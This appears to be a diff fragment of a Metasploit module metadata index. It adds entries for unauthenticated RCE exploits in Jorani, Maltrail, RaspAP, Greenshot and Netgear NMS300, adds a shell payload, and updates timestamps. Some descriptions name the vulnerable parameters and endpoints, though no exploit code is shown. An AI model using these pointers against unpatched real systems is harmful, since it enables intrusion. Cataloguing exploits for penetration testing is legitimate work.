+    "description": "This module exploits an unauthenticated Remote Code Execution in Jorani prior to 1.0.2.\n          It abuses 3 vulnerabilities: log poisoning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.\n          It has been tested on Jorani 1.0.0.",
+    "references": [
+      "CVE-2023-26469",
+      "URL-https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Jorani < 1.0.2"
+    ],
+    "mod_time": "2023-08-18 15:40:58 +0000",
+    "path": "/modules/exploits/multi/php/jorani_path_trav.rb",
+    "is_install_path": true,
+    "ref_name": "multi/php/jorani_path_trav",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/php/php_unserialize_zval_cookie": {
    "name": "PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",
    "fullname": "exploit/multi/php/php_unserialize_zval_cookie",
@@ -108467,7 +109425,7 @@
      "SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware",
      "SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox"
    ],
-    "mod_time": "2020-12-07 01:55:18 +0000",
+    "mod_time": "2023-08-09 00:22:57 +0000",
    "path": "/modules/exploits/solaris/ssh/pam_username_bof.rb",
    "is_install_path": true,
    "ref_name": "solaris/ssh/pam_username_bof",
@@ -109708,6 +110666,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_unix/http/maltrail_rce": {
+    "name": "Maltrail Unauthenticated Command Injection",
+    "fullname": "exploit/unix/http/maltrail_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-31",
+    "type": "exploit",
+    "author": [
+      "Ege BALCI <egebalci@pm.me>",
+      "Chris Wild"
+    ],
+    "description": "Maltrail is a malicious traffic detection system, utilizing publicly\n          available blacklists containing malicious and/or generally suspicious trails.\n          The Maltrail versions < 0.54 is suffering from a command injection vulnerability.\n          The `subprocess.check_output` function in `mailtrail/core/http.py` contains\n          a command injection vulnerability in the `params.get(\"username\")` parameter.\n          An attacker can exploit this vulnerability by injecting arbitrary OS commands\n          into the username parameter. The injected commands will be executed with the\n          privileges of the running process. This vulnerability can be exploited remotely\n          without authentication.\n\n          Successfully tested against Maltrail versions 0.52 and 0.53.",
+    "references": [
+      "EDB-51676",
+      "URL-https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/",
+      "URL-https://github.com/stamparm/maltrail/issues/19146"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 8338,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-08-16 16:52:48 +0000",
+    "path": "/modules/exploits/unix/http/maltrail_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/http/maltrail_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_unix/http/pfsense_clickjacking": {
    "name": "Clickjacking Vulnerability In CSRF Error Page pfSense",
    "fullname": "exploit/unix/http/pfsense_clickjacking",
@@ -110279,6 +111299,68 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_unix/http/raspap_rce": {
+    "name": "RaspAP Unauthenticated Command Injection",
+    "fullname": "exploit/unix/http/raspap_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-31",
+    "type": "exploit",
+    "author": [
+      "Ege BALCI <egebalci@pm.me>",
+      "Ismael0x00"
+    ],
+    "description": "RaspAP is feature-rich wireless router software that just works\n          on many popular Debian-based devices, including the Raspberry Pi.\n          A Command Injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows\n          unauthenticated attackers to execute arbitrary commands in the context of the user running RaspAP via the cfg_id\n          parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.\n\n          Successfully tested against RaspAP 2.8.0 and 2.8.7.",
+    "references": [
+      "CVE-2022-39986",
+      "URL-https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2",
+      "URL-https://github.com/advisories/GHSA-7c28-wg7r-pg6f"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-08-10 10:10:02 +0000",
+    "path": "/modules/exploits/unix/http/raspap_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/http/raspap_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_unix/http/schneider_electric_net55xx_encoder": {
    "name": "Schneider Electric Pelco Endura NET55XX Encoder",
    "fullname": "exploit/unix/http/schneider_electric_net55xx_encoder",
@@ -120750,7 +121832,7 @@
      "Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x64",
      "Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x86"
    ],
-    "mod_time": "2021-02-19 20:35:33 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/backupexec/ssl_uaf.rb",
    "is_install_path": true,
    "ref_name": "windows/backupexec/ssl_uaf",
@@ -136808,6 +137890,58 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/fileformat/greenshot_deserialize_cve_2023_34634": {
+    "name": "Greenshot .NET Deserialization Fileformat Exploit",
+    "fullname": "exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-26",
+    "type": "exploit",
+    "author": [
+      "p4r4bellum",
+      "bwatters-r7"
+    ],
+    "description": "There exists a .NET deserialization vulnerability in Greenshot version 1.3.274\n          and below.  The deserialization allows the execution of commands when a user opens\n          a Greenshot file.  The commands execute under the same permissions as the Greenshot\n          service.  Typically, is the logged in user.",
+    "references": [
+      "CVE-2023-34634",
+      "EDB-51633"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2023-08-17 08:48:42 +0000",
+    "path": "/modules/exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/greenshot_deserialize_cve_2023_34634",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/fileformat/gsm_sim": {
    "name": "GSM SIM Editor 5.15 Buffer Overflow",
    "fullname": "exploit/windows/fileformat/gsm_sim",
@@ -137058,7 +138192,7 @@
      "HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]",
      "Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/fileformat/homm3_h3m.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/homm3_h3m",
@@ -140795,7 +141929,7 @@
      "VLC 2.2.8 on Windows 10 x86",
      "VLC 2.2.8 on Windows 10 x64"
    ],
-    "mod_time": "2022-04-19 20:42:23 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/fileformat/vlc_mkv.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/vlc_mkv",
@@ -152364,17 +153498,23 @@
    "disclosure_date": "2016-02-04",
    "type": "exploit",
    "author": [
+      "Ege BALCI <egebalci@pm.me>",
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n        The application has a file upload vulnerability that can be exploited by an\n        unauthenticated remote attacker to execute code as the SYSTEM user.\n        Two servlets are vulnerable, FileUploadController (located at\n        /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).\n        This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and\n        1.1.0.13.",
+    "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n          The application has multiple vulnerabilities that can allow an unauthenticated remote\n          attacker to execute code as SYSTEM user. Vulnerabilities include authentication bypass,\n          SQL injection, arbitrary file upload, and privilege escalation across various versions.\n          This module is able to spawn a meterpreter session by chaining together two specific\n          vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.\n          This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.1.0.13, 1.7.0.12, and 1.7.0.1.",
    "references": [
+      "ZDI-23-920",
+      "ZDI-23-918",
+      "CVE-2023-38096",
+      "CVE-2023-38098",
      "CVE-2016-1525",
      "US-CERT-VU-777024",
      "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt",
-      "URL-https://seclists.org/fulldisclosure/2016/Feb/30"
+      "URL-https://seclists.org/fulldisclosure/2016/Feb/30",
+      "URL-https://kb.netgear.com/000065707/Security-Advisory-for-Multiple-Vulnerabilities-on-the-ProSAFE-Network-Management-System-PSV-2023-0024-PSV-2023-0025"
    ],
    "platform": "Windows",
-    "arch": "x86",
+    "arch": "x86, x64",
    "rport": 8080,
    "autofilter_ports": [
      80,
@@ -152394,7 +153534,7 @@
    "targets": [
      "NETGEAR ProSafe Network Management System 300 / Windows"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-08-02 18:03:57 +0000",
    "path": "/modules/exploits/windows/http/netgear_nms_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/http/netgear_nms_rce",
@@ -152402,6 +153542,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -158388,7 +159538,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2023-05-25 12:45:30 +0000",
+    "mod_time": "2023-07-21 15:34:49 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_comhijack.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_comhijack",
@@ -158443,7 +159593,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2023-05-25 12:45:30 +0000",
+    "mod_time": "2023-07-21 15:34:49 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_dotnet_profiler",
@@ -167748,7 +168898,7 @@
      "PlugX Type I",
      "PlugX Type II"
    ],
-    "mod_time": "2021-02-13 04:10:13 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/misc/plugx.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/plugx",
@@ -169801,7 +170951,7 @@
    "targets": [
      "Windows Universal (x64) - v7.80.3132"
    ],
-    "mod_time": "2023-02-08 15:46:07 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/nimsoft/nimcontroller_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/nimsoft/nimcontroller_bof",
@@ -170940,7 +172090,7 @@
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)",
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce",
@@ -173982,7 +175132,7 @@
      "Windows 10 Pro",
      "Windows 10 Enterprise Evaluation"
    ],
-    "mod_time": "2022-08-08 01:40:15 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue",
@@ -177202,7 +178352,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_http",
@@ -177240,7 +178390,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_https",
@@ -177278,7 +178428,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
@@ -177450,7 +178600,7 @@
    ],
    "description": "Listen for a connection and spawn a command shell over IPv6",
    "references": [
-
+      "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c"
    ],
    "platform": "BSD",
    "arch": "x64",
@@ -177458,7 +178608,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "bsd/x64/shell_bind_ipv6_tcp",
@@ -177523,7 +178673,7 @@
    ],
    "description": "Listen for a connection and spawn a command shell",
    "references": [
-
+      "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c"
    ],
    "platform": "BSD",
    "arch": "x64",
@@ -177531,7 +178681,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb",
    "is_install_path": true,
    "ref_name": "bsd/x64/shell_bind_tcp_small",
@@ -177559,7 +178709,7 @@
    ],
    "description": "Connect back to attacker and spawn a command shell over IPv6",
    "references": [
-
+      "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_reverse_tcp.asm.c"
    ],
    "platform": "BSD",
    "arch": "x64",
@@ -177567,7 +178717,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "bsd/x64/shell_reverse_ipv6_tcp",
@@ -177632,7 +178782,7 @@
    ],
    "description": "Connect back to attacker and spawn a command shell",
    "references": [
-
+      "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_reverse_tcp.asm.c"
    ],
    "platform": "BSD",
    "arch": "x64",
@@ -177640,7 +178790,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb",
    "is_install_path": true,
    "ref_name": "bsd/x64/shell_reverse_tcp_small",
@@ -179077,7 +180227,7 @@
    ],
    "description": "Fetch and execute an x64 payload from an HTTP server.\n\n        Listen for a connection in a random port and spawn a command shell.\n        Use nmap to discover the open port: 'nmap -sS target -p-'.",
    "references": [
-
+      "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm"
    ],
    "platform": "Linux",
    "arch": "cmd",
@@ -181536,7 +182686,7 @@
    ],
    "description": "Fetch and execute an x64 payload from an HTTPS server.\n\n        Listen for a connection in a random port and spawn a command shell.\n        Use nmap to discover the open port: 'nmap -sS target -p-'.",
    "references": [
-
+      "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm"
    ],
    "platform": "Linux",
    "arch": "cmd",
@@ -183995,7 +185145,7 @@
    ],
    "description": "Fetch and execute an x64 payload from a TFTP server.\n\n        Listen for a connection in a random port and spawn a command shell.\n        Use nmap to discover the open port: 'nmap -sS target -p-'.",
    "references": [
-
+      "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm"
    ],
    "platform": "Linux",
    "arch": "cmd",
@@ -185960,6 +187110,42 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_cmd/unix/bind_aws_instance_connect": {
+    "name": "Unix SSH Shell, Bind Instance Connect (via AWS API)",
+    "fullname": "payload/cmd/unix/bind_aws_instance_connect",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Creates an SSH shell using AWS Instance Connect",
+    "references": [
+      "URL-https://www.sempervictus.com/single-post/a-serial-case-of-air-on-the-side-channel"
+    ],
+    "platform": "Unix",
+    "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-08-01 15:02:11 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/bind_aws_instance_connect.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/bind_aws_instance_connect",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_cmd/unix/bind_busybox_telnetd": {
    "name": "Unix Command Shell, Bind TCP (via BusyBox telnetd)",
    "fullname": "payload/cmd/unix/bind_busybox_telnetd",
@@ -188770,7 +189956,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp",
@@ -188813,7 +189999,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid",
@@ -188855,7 +190041,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/bind_named_pipe",
@@ -188897,7 +190083,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/bind_tcp",
@@ -188944,7 +190130,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/bind_tcp_rc4",
@@ -188987,7 +190173,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/bind_tcp_uuid",
@@ -189029,7 +190215,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_http",
@@ -189073,7 +190259,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_https",
@@ -189115,7 +190301,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_named_pipe",
@@ -189157,7 +190343,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_tcp",
@@ -189204,7 +190390,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_tcp_rc4",
@@ -189247,7 +190433,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_tcp_uuid",
@@ -189289,7 +190475,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_winhttp",
@@ -189331,7 +190517,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_winhttps",
@@ -189373,7 +190559,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/encrypted_shell/reverse_tcp",
@@ -189415,7 +190601,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/encrypted_shell_reverse_tcp",
@@ -189454,7 +190640,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/exec",
@@ -189494,7 +190680,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/loadlibrary",
@@ -189533,7 +190719,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/messagebox",
@@ -189575,7 +190761,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp",
@@ -189619,7 +190805,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid",
@@ -189664,7 +190850,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/bind_named_pipe",
@@ -189708,7 +190894,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp",
@@ -189756,7 +190942,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_rc4",
@@ -189800,7 +190986,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_uuid",
@@ -189844,7 +191030,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_http",
@@ -189891,7 +191077,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
